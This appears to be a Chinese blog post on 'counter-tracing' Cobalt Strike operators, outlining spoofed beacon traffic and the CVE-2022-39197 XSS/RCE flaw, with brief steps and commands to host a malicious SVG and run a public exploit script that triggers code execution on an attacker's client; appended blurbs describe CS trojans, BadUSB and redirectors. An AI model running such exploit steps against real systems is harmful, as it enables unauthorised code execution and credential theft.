溯源反制-远程控制工具-CobaltStrike

已于 2023-04-25 16:52:43 修改
阅读量684 收藏 2
点赞数
分类专栏: 溯源反制 文章标签: 系统安全
于 2023-04-25 16:50:04 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62172162/article/details/130368677
版权

复现环境:
蓝队:47.106.xxx.xxx
红队:8.130.xxx.xxx
对抗Cobaltstrike中的手段:
1、伪造流量批量上线(欺骗防御)
https://mp.weixin.qq.com/s/VCRg6F9Wq-yg-qajDoJuaw
2、利用漏洞(CVE-2022-39197)
Cobalt Strike <=4.7 XSS
• 获取真实ip地址
• 获取NTLM
• RCE
• SSRF
https://github.com/its-arun/CVE-2022-39197
取得红队木马样本开始操作如下:


修改后打包,jar包如下:


-蓝队修改EXP里面的执行命令后编译(红队客户端触发的东西在这里修改)
修改:EvilJar/src/main/java/Exploit.java
-蓝队修改svg加载地址并架设Web服务(红队的CS服务器能访问的Web服务)


修改:evil.svg 指向url地址 


python3 -m http.server 7777
目的是调用svg文件
-蓝队执行EXP调用后门上线,攻击者进程查看时触发
python cve-2022-39197.py beacon.exe http://可访问的WEB:8888/evil.svg

加油上分版
关注
专栏目录
溯源系列:溯源案例一
weixin_54626591的博客
01-06 1454
溯源案例一
利用Cobalt Strike 通过exe木马实现远控
m0_65852484的博客
07-16 647
一、打开finalshell,执行命令 ./teamserver IP 密码。五、将exe文件发送给目标电脑,在目标电脑上双击即可实现监听。Host:服务器IP,Port:端口,密码:服务器密码。三、打开 Cobalt Strike,连接服务器。二、在服务器设置想用端口,40304端口。四、连接成功后,生成exe文件。
反击CobaltStrike
HBohan的博客
09-03 1387
背景 CobaltStrike(简称CS)作为一款渗透测试神器,采用C/S架构,可进行分布式团队协作。CS集成了端口转发、服务扫描、自动化溢出、多模式端口监听、Windows exe与dll 木马生、Java 木马生成、Office 宏病毒生成、木马捆绑等强大功能,深受广大红队同学的喜爱。为了规避侦测,红队往往会对CS采用一些隐匿手段,常见方式有云函数和CDN等。这些隐匿手段隐匿了CS的真实IP,诸如DDoS之类的流量无法穿透CDN到达CS,常规的攻击方式难以对CS服务器形成有效干扰和打击。只能止步于此了吗
msf和Cobalt Strike工具的应用(远程控制木马的工具
最新发布
m0_71483678的博客
08-11 1374
msf和cs的使用
Cobaltstrike系列(一)-- 远程控制
weixin_41489908的博客
02-07 3593
前天和爸爸在晒太阳,爸爸突然说了句:感觉怎么样,社会不好闯吧,如果太累的话就缓缓,老子给你撑一下。听到这里的时候我突然就嚎啕大哭了,想起自己这些年来,再看看父亲头上的白发,我突然发现自己还不够拼。。。 一、通过cmd窗口运行teamserver,后面加上目标ip 用户名 二、双击运行cobaltstrike.bat 三、输入用户名和密码登录 四、设置监听器,点击菜单栏cobalt strik...
20210215 Cobalt Strike 重定器/转发器/红队反溯源手段
qq_45290991的博客
02-15 872
Hello,大家好哇,我们上一节讲了Cobalt Strike Beacon的一些基础知识,但是好像喜欢看的小伙伴不是很多呀,是不是太枯燥呢?但是我觉得我们在渗透过程中也要做到知其然、知其所以然。所以,如果之前章节没看的小伙伴们可以点击下方图片阅读。 在真实的攻击环境中我们可能并不希望暴露自己的团队服务器,所以我们可以在Team Server前增加几个重定向器以隐藏自己的真实地址,拓扑图如下:其实这个重定向器的作用就是端口转发,但它有两个重要的功能:1. 保护你team server的真实IP2. 提供了冗
CobaltStrike 重定向器IP防溯源
LuckySec
12-09 3130
0x01 重定向器 重定向器是位于你的目标网络和你的团队服务器之间的系统。任何去往重定向器的连接将转发到你的团队服务器进行处理。通过重定向器,可以为你的 Beacon payload 提供多个回连主机。使用重定向器有助于提升行为安全,因为它会使溯源团队服务器的真实地址变得更加困难。 C2 Redirectors,就是在现有的C2上增加一个中转服务器,这个中转服务器起到功能和流量分离的作用,C2流量可以被中转到不同战术意义的服务器,比如打完就走的短期C2、需要长期控制驻留的C2和邮件钓鱼服务器等。 这个 C
利用Cobalt Strike通过exe木马实现远控|Cobalt Strike远程控制|Cobalt Strike 使用方法|CS使用方法
热门推荐
VI___
02-29 1万+
一、下载“CS-闪电攻击” 百度网盘:https://pan.baidu.com/s/1nXq58froWt0mu3q8I4HsSQ,提取码:fdvb CS分为两部分:客户端、服务端,CS 依赖 Java 1.8,所以运行CS程序前自行安装java,windows 和 kali 都装上吧,kali自带的openjdk也能用。 二、攻击 1、将cobalt Strike复制到 ...
红队系列-溯源与应急反制专题
aming小老弟
11-09 541
日志分析、流量特征分析、内存马。
红队专题-Cobalt strike从小白到飞升手册
aming小老弟
10-09 1409
4.0 2019年12月2日 更新 Cobalt Strike 4.0 手册奇安信 A-TEAMCobalt Strike 是一款 美国Red Team开发的 商业GUI框架式 优秀的渗透测试工具 简称CS为对手模拟渗透测试 和红队行动而设计的 协作工具平台,主要用于执行有目标的攻击和模拟高级威胁者的后渗透行动。可以利用网络漏洞获取主机权限后、从一个强大的图形界面控制所有的活动。因可以调用Mimikatz等其他知名工具并且可以作为团队服务使用,因此广受网络安全人员喜爱。
Cobalt Strike Aggressor Script
f_carey的博客
01-25 2339
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Cobalt Strike Aggressor Script 1 ProcessTree.cna 与 ProcessColor.cna2 elevate.cna3 Vincent Yiu 脚本合集3.1 CVE-2018-4878.cna3.2 auto-prepenv.cna3.3 Blacklist.cna.
红队系列-网络安全知识锦囊(持续更新)
aming小老弟
11-09 1358
AJP13是定向包协议。因为性能原因,使用二进制格式来传输可读性文本。AJP协议:WEB服务器通过TCP连接和SERVLET容器连接。为了减少进程生成socket的花费,WEB服务器和SERVLET容器之间尝试保持持久性的TCP连接,对多个请求/回复循环重用一个连接。一旦连接分配给一个特定的请求,在请求处理循环结束之前不会在分配。换句话说,在连接上,请求不是多元的。这个是连接两端的编码变得容易,虽然这导致在一时刻会有很多连接。
cobaltstrike3.8服务器搭建及使用
weixin_33881753的博客
10-31 1128
参考链接: https://www.ezreal.net/archives/166.htmlhttp://blog.cobaltstrike.com/category/cobalt-strike-2/ cobaltstrike作者博客https://wujunze.com/wooyun/drops/Cobalt%20Strike%20之团队服务器的搭建与DNS通讯演示.html   ...
【远控使用】Cobalt Strike横向渗透域控
孤桜懶契
09-11 2380
categories: 知识积累 top: FALSE copyright: true abbrlink: 1643719980 #date: '2021-8-7 12:00:00' #description:1400x780 tags: 内网渗透 提权 渗透测试 黑客工具photos: https://gitee.com/gylq/cloudimages/raw/master/img/image-20210826182104275.png 前言 Cobalt Strike.
CobaltStrike4.0 远控分析
mai1zhi2的博客
12-25 1254
1. 概述 Cobalt Strike是渗透测试神器,其功能简介就不用多说了,其4.0版本更新已有一段时间了,这里献丑分析一下,若有错误的地方望大伙指出,谢谢。 2. 样本信息 样本名 artifact4.exe 样本大小 14,336 字节 MD5 9ff9170e001f5619a0be11516051f538 SHA1 b824ed85d7dbe14f193f70d328d061e90c760736 3. 实验环境...
BadUSB超详细制作, 实现CobaltStrike远控上线
xf555er的博客
12-11 2739
BadUSB是利用了USB协议上的漏洞,通过更改USB的内部固件,在正常的USB接口接入后,模拟外置鼠标、键盘的功能,以此来使目标主机执行已经精心构造好的命令。在此过程中不会引起杀毒软件、防火墙的一丝怀疑。而且因为是在固件级别的应用,U盘格式化根本无法阻止其内部代码的执行。
红队专题-内网横向-工作组Workgroup与 Domain Active Directory域渗透
aming小老弟
12-21 1337
通过使用活动目录,管理员能够中心化、批量地更新和管理操作系统、应用、用户以及对数据的访问,而用户和管理员也能很容易地获取这些信息。而且因为活动目录具备中心化的管理能力,攻击者一旦获得域管理员权限,即可控制域内所有用户和主机,因此活动目录域环境也备受攻击者青睐。实际上LSA保护不能抵御这些攻击,它只会让你在执行这些攻击前,需要做一些额外的操作,让攻击变得更加困难一些。此功能基于PPL技术,它是一种纵深防御的安全功能,旨在“防止非管理员非PPL进程通过打开进程之类的函数串改PPL进程的代码和数据”。
内网渗透-内网环境下的横向移动总结
lza20001103的博客
08-19 1495
内网环境下的横向移动总结
Cobalt Strike 的通信过程 & 协议
shawdow_bug的博客
10-29 3311
这是一篇个人学习笔记,想更仔细了解原理,可阅读,主要内容是利用流量分析 Beacon 与 Cobalt Strike 服务端之间的通信过程,包括。当然,流量是加密的,需要一些辅助工具或脚本,其中的功能包括,等等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值